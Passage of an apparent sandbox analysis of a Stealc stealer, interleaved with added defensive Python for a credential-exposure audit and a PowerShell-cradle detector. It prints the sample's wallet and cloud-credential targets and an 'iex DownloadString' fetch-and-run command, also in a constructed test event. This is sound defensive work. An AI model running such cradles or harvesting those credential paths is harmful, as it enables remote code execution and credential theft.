                                    • lstrcat.KERNEL32(?,.keys), ref: 000A11E8
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A121F
                                    • lstrlen.KERNEL32(00E68980), ref: 000A122D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1251
                                    • lstrcat.KERNEL32(00000000,00E68980), ref: 000A1259
                                    • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 000A1264
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1288
                                    • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 000A1294
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A12BA
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A12FF
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000A130E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1335
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A133D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1378
                                    • lstrcat.KERNEL32(00000000), ref: 000A1385
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A13AC
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000A13D5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1401
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A143D
                                      • Part of subcall function 000BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 000BEE12
                                    • DeleteFileA.KERNEL32(?), ref: 000A1471
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                    • String ID: .keys$\Monero\wallet.keys
                                    • API String ID: 2881711868-3586502688
                                    • Opcode ID: b80f1530c804b1277dfc24a91559ffdffa5d51f688cb299b7c7e02f5963e2e98
                                    • Instruction ID: 77c8ef480052c4c0203667323cbc610eed0c94479b98ac96d7e7d8b727d1f569
                                    • Opcode Fuzzy Hash: b80f1530c804b1277dfc24a91559ffdffa5d51f688cb299b7c7e02f5963e2e98
                                    • Instruction Fuzzy Hash: 0EA19171E11215ABCB21EFF8EC89ADE77B9AF56300F044029F945E7252EB34DE418B91
                                    APIs
                                    • memset.MSVCRT ref: 000BE740
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 000BE769
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE79F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE7AD
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 000BE7C6
                                    • memset.MSVCRT ref: 000BE805
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 000BE82D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE85F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE86D
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 000BE886
                                    • memset.MSVCRT ref: 000BE8C5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 000BE8F1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE920
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE92E
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 000BE947
                                    • memset.MSVCRT ref: 000BE986
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$memset$FolderPathlstrcpy
                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 4067350539-3645552435
                                    • Opcode ID: d9e9835a0077d8556c19c3f938d5645221694263dd9fc92b019d2a93dd569b90
                                    • Instruction ID: 393ca9fa0fd7192d6e86546f27938b07dae2b8be0bfa70722fe0fd27fd36bb82
                                    • Opcode Fuzzy Hash: d9e9835a0077d8556c19c3f938d5645221694263dd9fc92b019d2a93dd569b90
                                    • Instruction Fuzzy Hash: 3E71F971E40258AFDB61EBA4DC4AFED7374AF58700F0004A9B719AB1D1DF709E848B55
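The function above (API ID lstrcat/memset/FolderPath/lstrcpy) builds paths from the sub-strings `\.IdentityService\`, `\.aws\`, `\.azure\` and `msal.cache` and walks them with a `*.*` wildcard; the `Azure\.aws`-style strings read as the names of the staging folders the stealer copies the results into. The script below is an added example, not code from the report or from the sample: it audits a user profile for the same locations so a responder can see what a Stealc infection running with that user's rights would have reached. Assumed, not taken from the page: that the base folders are the user profile and its `AppData\Local`, the severity notes per location, and the placeholder files it creates for the demonstration.

```python
"""
Credential-cache exposure audit (added example; not from the Joe Sandbox
report or the Stealc sample). Walks the locations the analysed function
enumerates (.aws, .azure, .IdentityService, msal.cache, with a *.* walk) and
reports names and sizes only. Base folders are an assumption of this example.
"""
from __future__ import annotations

import tempfile
from pathlib import Path
from typing import Dict, List

# Sub-paths from the function's string list (\.IdentityService\, \.aws\, \.azure\).
# The "why" text is this example's assessment, not something the report states.
TARGET_SUBPATHS: Dict[str, str] = {
    ".aws": "AWS CLI/SDK credentials and config (long-lived access keys)",
    ".azure": "Azure CLI context and token cache",
    ".IdentityService": "MSAL/Office identity cache (refresh tokens)",
}
MSAL_CACHE_NAME = "msal.cache"   # also in the function's string list


def audit_profile(profile_dir: Path) -> List[dict]:
    """Report each target directory found under the profile or its AppData\\Local.

    Mirrors the sample's *.* walk but only records names and sizes; it never
    opens the files, so the audit cannot itself leak a secret.
    """
    bases = [profile_dir, profile_dir / "AppData" / "Local"]   # assumption: where these live
    findings: List[dict] = []
    for sub, why in TARGET_SUBPATHS.items():
        for base in bases:
            d = base / sub
            if not d.is_dir():
                continue
            files = [p for p in d.rglob("*") if p.is_file()]
            findings.append({
                "name": sub,
                "path": str(d),
                "why": why,
                "file_count": len(files),
                "bytes": sum(p.stat().st_size for p in files),
                "msal_cache": any(p.name == MSAL_CACHE_NAME for p in files),
            })
    return findings


def build_constructed_profile(root: Path) -> Path:
    """Lay out a CONSTRUCTED profile with placeholder files (no real secrets)."""
    profile = root / "user"
    (profile / ".aws").mkdir(parents=True)
    (profile / ".aws" / "credentials").write_text("[default]\naws_access_key_id = PLACEHOLDER\n")
    (profile / ".azure").mkdir()
    (profile / ".azure" / "azureProfile.json").write_text("{}")
    ident = profile / "AppData" / "Local" / ".IdentityService"
    ident.mkdir(parents=True)
    (ident / MSAL_CACHE_NAME).write_bytes(b"\x00" * 16)
    return profile


def run_constructed_audit() -> List[dict]:
    """Build the constructed profile in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_profile(build_constructed_profile(Path(tmp)))


if __name__ == "__main__":
    # Point audit_profile(Path.home()) at a real profile to audit your own host.
    for f in run_constructed_audit():
        print(f"{f['path']}: {f['file_count']} file(s), {f['bytes']} bytes, "
              f"msal.cache={'yes' if f['msal_cache'] else 'no'}  <- {f['why']}")
```

Run it against `Path.home()` on a workstation to learn what the sample would have exfiltrated; anything it lists is a credential to rotate after an infection, since the stealer copies whole directories rather than parsing individual keys.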
                                    APIs
                                    • lstrcpy.KERNEL32 ref: 000BABCF
                                    • lstrlen.KERNEL32(00E6DDB0), ref: 000BABE5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAC0D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BAC18
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAC41
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAC84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BAC8E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BACB7
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000BACD1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BACF3
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000BACFF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAD28
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000BAD3A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAD5C
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000BAD68
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAD91
                                    • lstrlen.KERNEL32(00E6DD38), ref: 000BADA7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BADCF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BADDA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAE03
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BAE3F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BAE49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAE6F
                                    • lstrlen.KERNEL32(00000000), ref: 000BAE85
                                    • lstrcpy.KERNEL32(00000000,00E6DC48), ref: 000BAEB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen
                                    • String ID: f
                                    • API String ID: 2762123234-1993550816
                                    • Opcode ID: 63e19a6b292f0b91df8cc3b10325aad5b75295b8f38a12f4670131cd12355217
                                    • Instruction ID: e77e1b6e175e40bce8af42a7c0dbab8f0de14bc860f43726dd926991d2ff7b7b
                                    • Opcode Fuzzy Hash: 63e19a6b292f0b91df8cc3b10325aad5b75295b8f38a12f4670131cd12355217
                                    • Instruction Fuzzy Hash: 65B18F30A11616DFCB22EFA8DC49AEFB7B5AF12701F040435B81597A62EB30DD41CB92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C184F
                                    • lstrlen.KERNEL32(00E56198), ref: 000C1860
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1887
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1892
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C18C1
                                    • lstrlen.KERNEL32(000D4FA0), ref: 000C18D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C18F4
                                    • lstrcat.KERNEL32(00000000,000D4FA0), ref: 000C1900
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C192F
                                    • lstrlen.KERNEL32(00E55FE8), ref: 000C1945
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C196C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1977
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C19A6
                                    • lstrlen.KERNEL32(000D4FA0), ref: 000C19B8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C19D9
                                    • lstrcat.KERNEL32(00000000,000D4FA0), ref: 000C19E5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1A14
                                    • lstrlen.KERNEL32(00E561A8), ref: 000C1A2A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1A51
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1A5C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1A8B
                                    • lstrlen.KERNEL32(00E55FD8), ref: 000C1AA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1AC8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1AD3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1B02
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen
                                    • String ID: _
                                    • API String ID: 1049500425-2350027178
                                    • Opcode ID: 515f67ebe03ef73db55ae3480735457f0498a811d2a9379a779e7abbdc317e27
                                    • Instruction ID: 7768fc694732dc6503f4c9d6d95500c7c07a99194b451fd9430a4a65af2f074c
                                    • Opcode Fuzzy Hash: 515f67ebe03ef73db55ae3480735457f0498a811d2a9379a779e7abbdc317e27
                                    • Instruction Fuzzy Hash: DF91FD71A01703AFDB60AFB9EC88E9A77E9EF16301B14443DB896C7662DB34DC458B50
                                    APIs
                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,000B72A4), ref: 000C47E6
                                    • GetProcAddress.KERNEL32(00000000,connect), ref: 000C47FC
                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 000C480D
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000C481E
                                    • GetProcAddress.KERNEL32(00000000,htons), ref: 000C482F
                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 000C4840
                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 000C4851
                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 000C4862
                                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 000C4873
                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 000C4884
                                    • GetProcAddress.KERNEL32(00000000,send), ref: 000C4895
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                    • API String ID: 2238633743-3087812094
                                    • Opcode ID: 10a0f047457ffcb73d21f0faae2bfe874b84148be0761f120b97940ad5ec591f
                                    • Instruction ID: bee95948a80be520c2074c10fea36211083b7cc6d420d11560934c08e3f2377f
                                    • Opcode Fuzzy Hash: 10a0f047457ffcb73d21f0faae2bfe874b84148be0761f120b97940ad5ec591f
                                    • Instruction Fuzzy Hash: 0A114576D93721BB87119FB5BC0DB5A3BB8BB09707304491BFA51EA260DAF44840DF60
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BBE53
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BBE86
                                    • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 000BBE91
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BBEB1
                                    • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 000BBEBD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBEE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BBEEB
                                    • lstrlen.KERNEL32(')"), ref: 000BBEF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBF13
                                    • lstrcat.KERNEL32(00000000,')"), ref: 000BBF1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBF46
                                    • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 000BBF66
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BBF88
                                    • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 000BBF94
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBFBA
                                    • ShellExecuteEx.SHELL32(?), ref: 000BC00C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 4016326548-898575020
                                    • Opcode ID: 9c3ffdf992a28864c3f9f4a29c25af48e92495c8be34edc6c43ac067ca4c37d4
                                    • Instruction ID: e1626179a819a69dd976c1709b0997006ea96603c610cf4cab3d0ff618d48d34
                                    • Opcode Fuzzy Hash: 9c3ffdf992a28864c3f9f4a29c25af48e92495c8be34edc6c43ac067ca4c37d4
                                    • Instruction Fuzzy Hash: EE618131E11216ABDB21AFB9DC89AEF7BE9AF15700F04043AF509D7262DB74CD418B91
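The function above concatenates, in order, the hard-coded `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` path, the literal `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL taken from elsewhere in the sample (the `?` argument; the report does not show it), and the closing `')"`, then hands the result to ShellExecuteEx. This is the behaviour behind the "Yara detected Powershell download and execute" signature. The rule below is an added example, not code from the report or the sample: it matches that cradle in process-creation telemetry piece by piece, so whitespace, casing or a `System.` prefix do not defeat it. Assumed, not from the page: the Sysmon Event ID 1 field names (`Image`, `CommandLine`, `ParentImage`), the constructed events, and the placeholder URL.

```python
"""
Detection for the PowerShell download-and-execute launcher the analysed
function assembles (added example; not from the Joe Sandbox report or the
Stealc sample). Events are CONSTRUCTED and use Sysmon Event ID 1 field
names, which is an assumption about the reader's telemetry.
"""
import re
from typing import Dict, List, Optional

# Match the cradle piece by piece rather than as one literal string.
_PS_IMAGE = re.compile(r"(?:^|[\\/])powershell(?:_ise)?\.exe$", re.I)
_NOPROFILE = re.compile(r"(?<![\w-])-nop(?:rofile)?(?![\w-])", re.I)
_IEX_DOWNLOADSTRING = re.compile(
    r"\biex\s*\(\s*New-Object\s+(?:System\.)?Net\.WebClient\s*\)"
    r"\s*\.\s*DownloadString\s*\(\s*['\"]([^'\"]+)['\"]\s*\)",
    re.I,
)


def match_download_cradle(event: Dict[str, str]) -> Optional[dict]:
    """Return a finding when a process-creation event is the sample's cradle."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    if not _PS_IMAGE.search(image):
        return None                       # only powershell.exe launches count
    m = _IEX_DOWNLOADSTRING.search(cmd)
    if not m:
        return None                       # ordinary PowerShell use
    return {
        "url": m.group(1),
        "no_profile": bool(_NOPROFILE.search(cmd)),
        # The sample hard-codes the SysWOW64 path: 32-bit PowerShell spawned
        # by a 32-bit parent, which is itself unusual for interactive use.
        "wow64": "\\syswow64\\" in image.lower(),
        "parent": event.get("ParentImage", ""),
    }


def scan(events: List[Dict[str, str]]) -> List[dict]:
    """Run the rule over a batch of events and return the findings."""
    out = []
    for e in events:
        f = match_download_cradle(e)
        if f:
            out.append(f)
    return out


# CONSTRUCTED events: one true positive, one benign PowerShell, one decoy
# where the cradle text appears but the image is not PowerShell.
CONSTRUCTED_EVENTS: List[Dict[str, str]] = [
    {
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "CommandLine": r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" '
                       r'''-nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"''',
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    },
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'cmd.exe /c echo iex(New-Object Net.WebClient).DownloadString("x")',
    },
]

if __name__ == "__main__":
    for f in scan(CONSTRUCTED_EVENTS):
        print(f"cradle: url={f['url']} -nop={f['no_profile']} wow64={f['wow64']} parent={f['parent']}")
```

Because the sample launches the child through ShellExecuteEx rather than CreateProcess, the parent is still file.exe itself; pairing the `parent` field with a non-system, user-writable parent path is the cheapest way to separate this from administrative `DownloadString` use.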
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4793
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000B47C5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4812
                                    • lstrlen.KERNEL32(000D4B60), ref: 000B481D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B483A
                                    • lstrcat.KERNEL32(00000000,000D4B60), ref: 000B4846
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B486B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4898
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B48A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B48CA
                                    • StrStrA.SHLWAPI(?,00000000), ref: 000B48DC
                                    • lstrlen.KERNEL32(?), ref: 000B48F0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4931
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B49B8
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B49E1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4A0A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4A30
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4A5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 4107348322-3310892237
